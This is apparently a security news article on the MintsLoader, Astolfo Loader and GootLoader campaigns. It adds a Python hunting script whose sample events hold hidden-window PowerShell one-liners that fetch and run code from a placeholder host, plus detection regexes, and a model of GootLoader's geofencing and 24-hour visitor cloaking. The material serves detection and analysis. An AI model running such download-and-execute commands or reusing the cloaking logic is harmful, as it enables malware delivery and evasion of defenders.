Threat hunters have detailed an ongoing campaign that uses a malware loader called MintsLoader to distribute secondary payloads such as the StealC information stealer and a legitimate open-source network computing platform called BOINC.

"MintsLoader is a PowerShell-based malware loader that has been delivered via spam emails linking to KongTuke/ClickFix pages or to a JScript file," cybersecurity firm eSentire said in an analysis.

The campaign has targeted the electricity, oil and gas, and legal services sectors in the United States and Europe, according to the company, which detected the activity in early January 2025.

The development comes amid a spike in malicious campaigns that abuse fake CAPTCHA verification checks to coerce users into copying and executing PowerShell scripts in order to pass the checks, a technique that has come to be known as ClickFix and KongTuke.
"KongTuke includes an injected script that currently causes associated websites to display fake 'verify you are human' pages," Palo Alto Networks Unit 42 said in a report detailing the BOINC distribution campaign.

"These fake verification pages load the potential victim's copy/paste buffer with a malicious PowerShell script. The page also provides detailed instructions asking the potential victim to paste and execute the script in the Run window."
The attack chain documented by eSentire starts when a user clicks a link in a spam email, which downloads an obfuscated JavaScript file. That script runs a PowerShell command that fetches MintsLoader with curl and executes it, after which the script deletes itself from the host so as to leave no trace.

In an alternative sequence, email recipients are redirected to ClickFix-style pages that deliver MintsLoader through the Windows Run dialog.

The loader, in turn, contacts a command-and-control (C2) server to fetch intermediate PowerShell payloads that perform various checks to evade sandboxes and resist analysis. It also implements a domain generation algorithm (DGA) whose seed value is used to derive the C2 domain name.
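Both delivery chains above leave the same kind of trace on an endpoint: a PowerShell process whose parent and command line do not belong together. The following is an added hunting example, not eSentire's detection content. It models the JScript dropper chain (a Windows script host spawning PowerShell that uses curl to download and run a payload) and the ClickFix chain (a one-liner pasted into the Run dialog, so PowerShell's parent is explorer.exe). The events, paths and URLs are constructed to resemble Sysmon process-creation records; they are not real MintsLoader telemetry.

```python
"""Hunting logic for the two MintsLoader delivery chains described above.

Added example, not eSentire's detection content. The events and command
lines are constructed to resemble Sysmon process-creation records; they
are not real MintsLoader telemetry.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str          # path of the created process
    parent_image: str   # path of the parent process
    command_line: str


# Constructed sample events (assumed paths and URLs, not real samples).
SAMPLE_EVENTS = [
    # 1. JScript dropper: wscript.exe spawns PowerShell that curls the loader.
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\wscript.exe",
              'powershell -w hidden -c "curl -o $env:TEMP\\m.ps1 http://example.invalid/m; & $env:TEMP\\m.ps1"'),
    # 2. ClickFix: pasted into Win+R, so explorer.exe is the parent.
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe",
              'powershell -nop -w hidden -c "iwr http://example.invalid/v | iex"'),
    # 3. Benign scheduled script: no download primitive in the command line.
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Program Files\Backup\agent.exe",
              'powershell -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1'),
    # 4. Unrelated process with the same parent as the ClickFix case.
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe", "cmd /c dir"),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# "curl" is an alias of Invoke-WebRequest in Windows PowerShell 5, so it and
# the other tokens below all indicate a network download from the command line.
DOWNLOAD_RE = re.compile(
    r"\b(curl|wget|iwr|invoke-webrequest|downloadstring|downloadfile|net\.webclient)\b", re.I)
EXEC_RE = re.compile(r"(\biex\b|invoke-expression|start-process|&\s*\$env:)", re.I)
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent):
    """Return a verdict label for one process-creation event, or None."""
    if basename(ev.image) != "powershell.exe":
        return None
    parent = basename(ev.parent_image)
    downloads = bool(DOWNLOAD_RE.search(ev.command_line))
    executes = bool(EXEC_RE.search(ev.command_line))
    hidden = bool(HIDDEN_RE.search(ev.command_line))
    if parent in SCRIPT_HOSTS and downloads:
        return "jscript_dropper_chain"
    if parent == "explorer.exe" and downloads and (executes or hidden):
        return "clickfix_run_dialog"
    return None


def hunt(events):
    """Return (verdict, command_line) pairs for every event that matched."""
    hits = []
    for ev in events:
        verdict = classify(ev)
        if verdict:
            hits.append((verdict, ev.command_line))
    return hits


if __name__ == "__main__":
    for verdict, cmd in hunt(SAMPLE_EVENTS):
        print(f"{verdict}: {cmd}")
```

The parent-process check is what separates the ClickFix case from ordinary administrative PowerShell: a hidden-window download-and-execute one-liner whose parent is explorer.exe is what a Win+R paste looks like, and a download spawned by wscript.exe or cscript.exe matches the JScript dropper. Because the dropper deletes itself, the process-creation record may be the only artefact left, so this logic belongs on telemetry that is shipped off the host.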
The end goal of the attack is the deployment of StealC, an information stealer that has been sold under the malware-as-a-service (MaaS) model since early 2023 and is believed to be a rework of another malware family known as Arkei. One of its distinguishing features is that it avoids infecting machines located in Russia, Ukraine, Belarus, Kazakhstan or Uzbekistan.
The MintsLoader news follows the emergence of an updated version of JinxLoader named Astolfo Loader (aka Jinx V3), which was rewritten in C++, probably for performance reasons, after the malware author Rendnza sold its source code to two separate buyers, @delfin and @AstolfoLoader.

"While @delfin claims to sell JinxLoader V2 unchanged, @AstolfoLoader decided to rebrand the malware and switch the stub to C++ (Jinx V3) instead of using the original Go binary compiled at the end of last year."

"Services such as JinxLoader and its successor, Astolfo Loader (Jinx V3), show how such tools can spread quickly and at an affordable price, and they can be purchased through popular public hacking forums accessible to virtually anyone with an internet connection."
Cybersecurity researchers have also shed light on the inner workings of GootLoader malware campaigns, which are known to weaponize search engine optimization (SEO) poisoning to redirect victims searching for agreements and contracts to compromised WordPress sites. These sites host a realistic-looking message board offering a file download that purports to contain what the victim was looking for.

The malware operators have been found to modify the WordPress sites so that they dynamically load the contents of the fake forum pages from another server, which Sophos calls the "mothership".

Beyond geofencing IP address ranges and only accepting requests from certain countries of interest, GootLoader campaigns go a step further: a potential victim is allowed to visit the infected site only once every 24 hours, after which the IP address is added to a block list.

"Every aspect of this process is obfuscated to such an extent that even the owners of the compromised WordPress pages often cannot identify the modifications on their own site or trigger the GootLoader code if they visit their own pages," Sophos researcher Gabor Szappanos said.
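The geofence and the once-per-24-hours rule described above are what make the lure so hard to reproduce: the second fetch from an analyst's address gets the clean site. The following is an added example that reconstructs that gating behaviour from the description; it is not Sophos's or GootLoader's code. The country lookup is a constructed stub standing in for a GeoIP database, and the set of allowed countries is assumed for illustration.

```python
"""Model of the visitor gating Sophos describes for GootLoader's compromised
WordPress sites.

Added example reconstructing the described behaviour; not Sophos's or
GootLoader's code. Two rules are modelled: requests are geofenced to
countries of interest, and an IP address is served the fake forum page at
most once every 24 hours, after which it goes on a block list. The GeoIP
table and the allowed-country set are assumed for illustration.
"""
from datetime import datetime, timedelta

ALLOWED_COUNTRIES = {"US", "GB", "DE"}      # assumed "countries of interest"
REVISIT_WINDOW = timedelta(hours=24)

# Constructed IP-to-country table (documentation-range addresses).
GEOIP_STUB = {
    "203.0.113.5": "US",
    "198.51.100.7": "DE",
    "192.0.2.9": "RU",
}


class GootLoaderGate:
    def __init__(self, geoip=GEOIP_STUB):
        self.geoip = geoip
        self.blocklist = {}   # ip -> time the lure was last served

    def decide(self, ip: str, now: datetime) -> str:
        """Return "lure" to serve the fake forum page, "benign" otherwise."""
        if self.geoip.get(ip) not in ALLOWED_COUNTRIES:
            return "benign"                     # outside the geofence
        last = self.blocklist.get(ip)
        if last is not None and now - last < REVISIT_WINDOW:
            return "benign"                     # block-listed for 24 hours
        self.blocklist[ip] = now                # served once; add to block list
        return "lure"


def simulate():
    """Replay a constructed visit sequence and return the gate's decisions."""
    t0 = datetime(2025, 1, 15, 12, 0)
    gate = GootLoaderGate()
    visits = [
        ("203.0.113.5", t0),                        # first visit from the US
        ("203.0.113.5", t0 + timedelta(hours=2)),   # analyst re-fetches the page
        ("203.0.113.5", t0 + timedelta(hours=25)),  # window has elapsed
        ("192.0.2.9", t0),                          # outside the geofence
        ("198.51.100.7", t0),                       # different allowed country
    ]
    return [(ip, gate.decide(ip, when)) for ip, when in visits]


if __name__ == "__main__":
    for ip, verdict in simulate():
        print(ip, verdict)
```

The practical consequence for anyone reproducing a GootLoader chain is visible in the second and third visits: the same address gets the benign page for the rest of the 24-hour window, so a repeat fetch from the same egress, or from a sandbox outside the targeted countries, proves nothing about the site. Capture the first response, or use a fresh address in a targeted country.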